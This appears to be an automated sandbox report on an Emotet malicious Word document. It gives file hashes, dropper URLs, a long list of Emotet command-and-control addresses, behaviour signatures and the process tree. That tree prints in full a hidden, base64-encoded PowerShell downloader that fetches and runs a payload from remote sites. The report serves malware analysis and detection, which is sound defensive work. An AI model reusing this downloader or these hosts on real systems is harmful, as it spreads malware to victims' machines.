Analysis
-
max time kernel
60s -
max time network
60s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
30-10-2020 13:00
Static task
static1
General
-
Target
emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc
-
Size
208KB
-
MD5
629397193e4445a719af0c3b08d03666
-
SHA1
05e7aa8f51f1fe2d939b6efbe87d351cd2dbe73e
-
SHA256
dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b
-
SHA512
dcfc7f1e181a971153e778002a90dd77ff702339bb66b81ce44520d1236897677228b17e7d28f8cc132323e105cacfc76970928d23fa805fca6fe741304e7912
Malware Config
Extracted
http://kharazmischl.com/w/okz/
http://help-m2c.eccang.com/pseovck27kr/n/
http://myfarasan.com/sitepage/z/
http://chengmikeji.com/dertouqua/Ocm/
https://enews.enkj.com/wordpress/bd/
http://ecobaratocanaria.com/wp-admin/ms/
https://cimsjr.com/hospital/4q/
Extracted
emotet
Epoch1
190.202.229.74:80
118.69.11.81:7080
70.39.251.94:8080
87.230.25.43:8080
94.23.62.116:8080
37.187.161.206:8080
45.46.37.97:80
138.97.60.141:7080
177.144.130.105:8080
169.1.39.242:80
209.236.123.42:8080
202.134.4.210:7080
193.251.77.110:80
2.45.176.233:80
217.13.106.14:8080
189.223.16.99:80
190.101.156.139:80
77.238.212.227:80
181.58.181.9:80
37.183.81.217:80
74.58.215.226:80
174.118.202.24:443
168.197.45.36:80
81.215.230.173:443
192.175.111.212:7080
216.47.196.104:80
128.92.203.42:80
94.176.234.118:443
191.182.6.118:80
212.71.237.140:8080
24.232.228.233:80
177.73.0.98:443
177.23.7.151:80
24.135.69.146:80
83.169.21.32:7080
189.34.181.88:80
179.222.115.170:80
177.144.130.105:443
213.197.182.158:8080
5.89.33.136:80
77.78.196.173:443
120.72.18.91:80
50.28.51.143:8080
190.64.88.186:443
111.67.12.221:8080
12.162.84.2:8080
46.105.114.137:8080
59.148.253.194:8080
201.213.177.139:80
82.76.52.155:80
172.104.169.32:8080
188.251.213.180:80
46.43.2.95:8080
137.74.106.111:7080
188.135.15.49:80
185.94.252.27:443
197.232.36.108:80
60.249.78.226:8080
187.162.248.237:80
181.129.96.162:8080
46.101.58.37:8080
109.242.153.9:80
178.211.45.66:8080
200.59.6.174:80
83.103.179.156:80
172.86.186.21:8080
70.32.115.157:8080
81.214.253.80:443
201.49.239.200:443
149.202.72.142:7080
190.45.24.210:80
186.189.249.2:80
219.92.13.25:80
170.81.48.2:80
51.75.33.127:80
192.241.143.52:8080
45.33.77.42:8080
152.169.22.67:80
185.183.16.47:80
186.70.127.199:8090
1.226.84.243:8080
78.206.229.130:80
37.179.145.105:80
68.183.170.114:8080
192.232.229.54:7080
103.236.179.162:80
70.32.84.74:8080
79.118.74.90:80
60.93.23.51:80
181.120.29.49:80
213.52.74.198:80
51.255.165.160:8080
183.176.82.231:80
186.193.229.123:80
98.103.204.12:443
129.232.220.11:8080
181.61.182.143:80
68.183.190.199:8080
190.115.18.139:8080
200.24.255.23:80
103.13.224.53:80
85.214.26.7:8080
190.24.243.186:80
87.106.46.107:8080
177.107.79.214:8080
12.163.208.58:80
187.162.250.23:443
109.101.137.162:8080
82.76.111.249:443
181.30.61.163:443
5.196.35.138:7080
51.15.7.145:80
192.198.91.138:443
188.157.101.114:80
189.2.177.210:443
181.123.6.86:80
109.190.35.249:80
45.16.226.117:443
190.190.219.184:80
104.131.41.185:8080
101.187.81.254:80
62.84.75.50:80
178.250.54.208:8080
201.71.228.86:80
190.92.122.226:80
138.97.60.140:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3208 1972 POwersheLL.exe -
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1624-16-0x0000000002340000-0x0000000002350000-memory.dmp emotet behavioral1/memory/3440-22-0x0000000002140000-0x0000000002150000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
POwersheLL.exeflow pid process 20 3208 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
Xp13y90.exesdchange.exepid process 1624 Xp13y90.exe 3440 sdchange.exe -
Drops file in System32 directory 1 IoCs
Processes:
Xp13y90.exedescription ioc process File opened for modification C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe Xp13y90.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 984 WINWORD.EXE 984 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POwersheLL.exesdchange.exepid process 3208 POwersheLL.exe 3208 POwersheLL.exe 3208 POwersheLL.exe 3440 sdchange.exe 3440 sdchange.exe 3440 sdchange.exe 3440 sdchange.exe 3440 sdchange.exe 3440 sdchange.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 3208 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEXp13y90.exesdchange.exepid process 984 WINWORD.EXE 984 WINWORD.EXE 984 WINWORD.EXE 984 WINWORD.EXE 984 WINWORD.EXE 984 WINWORD.EXE 984 WINWORD.EXE 1624 Xp13y90.exe 1624 Xp13y90.exe 3440 sdchange.exe 3440 sdchange.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
Xp13y90.exedescription pid process target process PID 1624 wrote to memory of 3440 1624 Xp13y90.exe sdchange.exe PID 1624 wrote to memory of 3440 1624 Xp13y90.exe sdchange.exe PID 1624 wrote to memory of 3440 1624 Xp13y90.exe sdchange.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -windowstyle hidden -ENCOD IABzAGUAdAAtAEkAdABlAE0AIABWAEEAcgBpAEEAQgBMAGUAOgBTAE4AbQBrAGgAIAAgACgAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANAB9AHsAMAB9AHsAMgB9ACIAIAAtAEYAJwBlAEMAVAAnACwAJwBTAFkAUwBUAEUAbQAuAEkAbwAuACcALAAnAG8AcgBZACcALAAnAGQAJwAsACcASQBSACcAKQApADsAIAAgACQARQBrAGIAOQBMAHEAPQAgACAAWwBUAHkAUABFAF0AKAAiAHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9AHsANwB9AHsAMQB9AHsANgB9AHsANQB9ACIAIAAtAGYAJwBzAGUAcgB2ACcALAAnAE8AaQBOACcALAAnAFMAWQBzAHQAZQBtAC4AJwAsACcAaQBDACcALAAnAE4AZQB0AC4AJwAsACcAZwBFAFIAJwAsACcAdABtAGEATgBhACcALAAnAGUAcAAnACkAIAAgADsAIAAgACQASAA3ADYAMQBzADMAegA9ACgAJwBKADAAJwArACgAJwBzAHcAJwArACcAeABlACcAKQArACcAOAAnACkAOwAkAFQAegAwAGoAdwBjAGQAPQAkAE8AMgBzADAAcABoADUAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMwBrADgAdQA0AGUAOwAkAE4AbgBfADEAaABuAGMAPQAoACgAJwBUACcAKwAnAHAAaQAxAHcAJwApACsAJwA2ACcAKwAnADcAJwApADsAIAAgACQAUwBuAE0AawBIADoAOgAiAGMAcgBFAGAAQQBUAEUARABJAGAAUgBgAGUAQwBUAE8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA2ADcAJwArACcAMwBXACcAKwAnAHEAZQAnACkAKwAoACcAdwB6ACcAKwAnAGUAcgAnACkAKwAoACcANgAnACsAJwA3ADMAJwApACsAJwBaACcAKwAoACcAZABvACcAKwAnAHoAMAB4AGYANgAnACsAJwA3ACcAKQArACcAMwAnACkAIAAgAC0AQwByAGUAcABMAGEAQwBFACAAIAAoACcANgAnACsAJwA3ADMAJwApACwAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQARQA0AGYAaABmAGcAZwA9ACgAKAAnAEIAJwArACcAagB0ADIAJwApACsAKAAnAHMANAAnACsAJwBlACcAKQApADsAIAAgACQAZQBrAGIAOQBMAHEAOgA6ACIAUwBFAEMAVQBSAEkAVABZAFAAUgBPAGAAVABPAEMAYABPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAFYAbwBjAGoAZgBnAG4APQAoACgAJwBSAHEAaQAnACsAJwBfAF8AJwApACsAJwBkADAAJwApADsAJABRAHgAbQBuAHAAdAA0ACAAPQAgACgAKAAnAFgAJwArACcAcAAxACcAKQArACcAMwAnACsAKAAnAHkAJwArACcAOQAwACcAKQApADsAJABGADgAeQAwADYAbQB2AD0AKAAoACcASAAnACsAJwB5ADcAaQAnACkAKwAnADQAdwAnACsAJwAyACcAKQA7ACQASwAwAHQAMQA5AGcAZAA9ACgAKAAnAEgAJwArACcAaAA2ACcAKQArACgAJwBkACcAKwAnAGMAbQAnACkAKwAnADgAJwApADsAJABRADYAYgBqAGsAdwBuAD0AJABIAE8ATQBFACsAKAAoACgAJwBJAEUAdwBXACcAKwAnAHEAZQAnACkAKwAoACcAdwB6ACcAKwAnAGUAcgBJAEUAdwBaAGQAJwArACcAbwAnACkAKwAoACcAegAwACcAKwAnAHgAJwApACsAJwBmACcAKwAoACcASQAnACsAJwBFAHcAJwApACkALQBDAHIARQBwAGwAYQBDAEUAIAAoACcASQBFACcAKwAnAHcAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAFEAeABtAG4AcAB0ADQAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEwAegBiAGkAcwBwAG0APQAoACgAJwBXACcAKwAnAGsAegAnACkAKwAnAGwAJwArACgAJwBoADIAJwArACcAdAAnACkAKQA7ACQASgA4AGYAMgBxADIAbgA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwAaQBFAG4AdAA7ACQAQwBuAHcAYQBtAGwAYQA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwADoAJwArACgAKAAnAF0AWwAnACsAJwAoACcAKQApACsAKAAoACcAcwApACcAKwAnAF0AdwBdACcAKQApACsAJwBbACcAKwAoACcAKABzACkAXQAnACsAJwB3AGsAJwArACcAaABhAHIAYQB6AG0AaQAnACsAJwBzAGMAJwApACsAKAAnAGgAbAAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACgAJwBtACcAKwAnAF0AWwAoAHMAJwApACkAKwAnACkAJwArACgAJwBdAHcAJwArACcAdwAnACkAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAbwBrACcAKQArACgAKAAnAHoAXQBbACcAKwAnACgAJwApACkAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQAnACsAJwB3AEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAJwArACcAOgBdACcAKQArACgAJwBbACgAcwApAF0AdwAnACsAJwBdACcAKQArACgAJwBbACgAcwApACcAKwAnAF0AdwAnACkAKwAnAGgAZQAnACsAKAAnAGwAJwArACcAcAAtAG0AMgAnACsAJwBjAC4AZQBjACcAKQArACgAJwBjACcAKwAnAGEAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACsAJwBtAF0AWwAoAHMAJwArACcAKQBdAHcAJwApACsAKAAnAHAAcwBlACcAKwAnAG8AJwApACsAKAAnAHYAYwBrADIANwAnACsAJwBrACcAKwAnAHIAJwApACsAKAAnAF0AWwAnACsAJwAoAHMAKQBdACcAKQArACgAJwB3AG4AJwArACcAXQBbACgAcwApACcAKwAnAF0AdwAnACkAKwAnAEAAJwArACgAJwBoACcAKwAnAHQAdABwADoAXQAnACkAKwAoACgAJwBbACcAKwAnACgAcwAnACkAKQArACgAKAAnACkAXQAnACkAKQArACcAdwAnACsAKAAnAF0AJwArACcAWwAoAHMAKQBdAHcAJwApACsAJwBtACcAKwAnAHkAJwArACgAJwBmACcAKwAnAGEAcgBhAHMAJwApACsAJwBhACcAKwAoACcAbgAuACcAKwAnAGMAbwBtACcAKQArACcAXQBbACcAKwAoACcAKAAnACsAJwBzACkAXQB3AHMAJwApACsAJwBpACcAKwAoACcAdAAnACsAJwBlAHAAJwApACsAJwBhACcAKwAoACcAZwBlAF0AWwAoAHMAJwArACcAKQBdACcAKQArACcAdwB6ACcAKwAoACgAJwBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdAHcAJwApACkAKwAnAEAAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAKAAnADoAXQAnACsAJwBbACcAKQArACgAJwAoAHMAKQAnACsAJwBdACcAKQArACcAdwAnACsAJwBdAFsAJwArACgAJwAoAHMAKQAnACsAJwBdACcAKwAnAHcAYwBoACcAKQArACcAZQAnACsAJwBuAGcAJwArACcAbQBpACcAKwAoACcAawBlACcAKwAnAGoAJwApACsAJwBpACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcAXQAnACsAJwBbACgAcwApACcAKQArACgAJwBdAHcAJwArACcAZAAnACkAKwAoACcAZQAnACsAJwByAHQAJwApACsAKAAnAG8AJwArACcAdQBxACcAKQArACgAJwB1AGEAJwArACcAXQAnACkAKwAoACcAWwAoAHMAKQAnACsAJwBdAHcAJwApACsAJwBPACcAKwAoACgAJwBjAG0AJwArACcAXQBbACgAJwApACkAKwAoACgAJwBzACkAXQB3AEAAaAAnACsAJwB0ACcAKQApACsAJwB0ACcAKwAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAnACsAJwAoACcAKwAoACgAJwBzACkAJwApACkAKwAoACcAXQB3AF0AJwArACcAWwAnACkAKwAnACgAJwArACcAcwAnACsAJwApACcAKwAoACcAXQB3AGUAbgAnACsAJwBlAHcAcwAuACcAKQArACcAZQAnACsAJwBuACcAKwAoACcAawBqAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAF0AJwArACcAWwAoAHMAKQBdACcAKQArACcAdwAnACsAKAAnAHcAbwByACcAKwAnAGQAJwArACcAcAByAGUAcwBzACcAKQArACcAXQBbACcAKwAoACgAJwAoAHMAJwApACkAKwAoACgAJwApAF0AJwApACkAKwAnAHcAJwArACcAYgAnACsAJwBkAF0AJwArACgAKAAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACgAJwBdACcAKwAnAHcAQAAnACkAKwAnAGgAJwArACgAKAAnAHQAdABwADoAJwArACcAXQBbACcAKwAnACgAJwApACkAKwAnAHMAJwArACgAKAAnACkAXQB3ACcAKwAnAF0AWwAnACsAJwAoAHMAKQAnACkAKQArACgAJwBdAHcAJwArACcAZQBjAG8AJwApACsAJwBiACcAKwAoACcAYQAnACsAJwByAGEAJwApACsAJwB0ACcAKwAnAG8AYwAnACsAKAAnAGEAbgAnACsAJwBhACcAKQArACgAJwByACcAKwAnAGkAYQAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwBdACcAKQArACgAKAAnAFsAKAAnACkAKQArACcAcwAnACsAKAAoACcAKQBdACcAKwAnAHcAdwBwACcAKwAnAC0AYQBkAG0AaQAnACkAKQArACgAJwBuAF0AJwArACcAWwAnACkAKwAoACgAJwAoAHMAKQBdAHcAbQBzAF0AJwArACcAWwAnACsAJwAoACcAKwAnAHMAKQBdACcAKwAnAHcAJwArACcAQABoAHQAdABwAHMAJwArACcAOgBdAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACkAKQArACcAXQB3ACcAKwAnAF0AJwArACgAKAAnAFsAKAAnACkAKQArACgAKAAnAHMAKQAnACsAJwBdACcAKQApACsAKAAnAHcAJwArACcAYwBpAG0AcwBqACcAKQArACcAcgAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAoACcAXQAnACsAJwBbACgAcwAnACkAKQArACgAKAAnACkAXQB3ACcAKwAnAGgAJwApACkAKwAnAG8AJwArACcAcwAnACsAKAAnAHAAaQB0ACcAKwAnAGEAJwApACsAKAAnAGwAXQBbACcAKwAnACgAcwApAF0AJwArACcAdwA0AHEAJwApACsAKAAoACcAXQAnACsAJwBbACgAcwAnACkAKQArACgAKAAnACkAJwArACcAXQB3ACcAKQApACkALgAiAFIAYABlAFAAbABgAEEAYwBlACIAKAAoACcAXQBbACcAKwAoACcAKAAnACsAJwBzACkAJwApACsAJwBdAHcAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwB4AHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAHAAYABsAGkAdAAiACgAJABSADEAbgB6AG8AagBxACAAKwAgACQAVAB6ADAAagB3AGMAZAAgACsAIAAkAFYAegB6AHgAcwBzADcAKQA7ACQAVQAwADQAZQB1AHQAcwA9ACgAJwBRACcAKwAoACcAaAAnACsAJwA2AHkAcwAnACkAKwAnADMAMwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEMAYwBvAHUAbgAzAGMAIABpAG4AIAAkAEMAbgB3AGEAbQBsAGEAKQB7AHQAcgB5AHsAJABKADgAZgAyAHEAMgBuAC4AIgBEAE8AYABXAGAATgBsAG8AQQBkAGAARgBJAEwARQAiACgAJABDAGMAbwB1AG4AMwBjACwAIAAkAFEANgBiAGoAawB3AG4AKQA7ACQAUgB2AHAAbgBfAGgAdAA9ACgAJwBHAGIAJwArACgAJwBvADUAJwArACcAMgB6ACcAKQArACcANgAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUQA2AGIAagBrAHcAbgApAC4AIgBMAGAARQBOAEcAdABIACIAIAAtAGcAZQAgADMANwAwADgANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwAnACsAJwBpAG4AMwAnACkAKwAoACcAMgAnACsAJwBfAFAAcgAnACsAJwBvAGMAZQBzACcAKQArACcAcwAnACkAKQAuACIAYwBgAFIAZQBBAHQARQAiACgAJABRADYAYgBqAGsAdwBuACkAOwAkAFMAdABpADAAcAAxAGYAPQAoACcASQAnACsAJwBjAGcAJwArACgAJwBvADMAcwAnACsAJwBjACcAKQApADsAYgByAGUAYQBrADsAJABEADAAOQBkAHQAMAB2AD0AKAAnAFAANgAnACsAKAAnAHQAJwArACcAZQB6AGsAMAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgBrADMAagB0AHUAawA9ACgAKAAnAEcAJwArACcAZgB5AGUAbQAnACkAKwAnADQAJwArACcAcgAnACkA1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exeC:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe"C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exeMD5
adc67e5610494dbbaff4b193f7b81f93
SHA16d98ac46c3eeba15b489b1807e8758722de6c64b
SHA2564cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1
SHA51254077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce
-
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exeMD5
adc67e5610494dbbaff4b193f7b81f93
SHA16d98ac46c3eeba15b489b1807e8758722de6c64b
SHA2564cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1
SHA51254077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce
-
C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exeMD5
adc67e5610494dbbaff4b193f7b81f93
SHA16d98ac46c3eeba15b489b1807e8758722de6c64b
SHA2564cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1
SHA51254077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce
-
memory/984-0-0x00007FF81BB20000-0x00007FF81C157000-memory.dmpFilesize
6.2MB
-
memory/984-2-0x000002BD2CE26000-0x000002BD2CE2F000-memory.dmpFilesize
36KB
-
memory/1624-16-0x0000000002340000-0x0000000002350000-memory.dmpFilesize
64KB
-
memory/3208-8-0x00007FF815430000-0x00007FF815E1C000-memory.dmpFilesize
9.9MB
-
memory/3208-9-0x0000020978180000-0x0000020978181000-memory.dmpFilesize
4KB
-
memory/3208-10-0x0000020978370000-0x0000020978371000-memory.dmpFilesize
4KB
-
memory/3440-17-0x0000000000000000-mapping.dmp
-
memory/3440-22-0x0000000002140000-0x0000000002150000-memory.dmpFilesize
64KB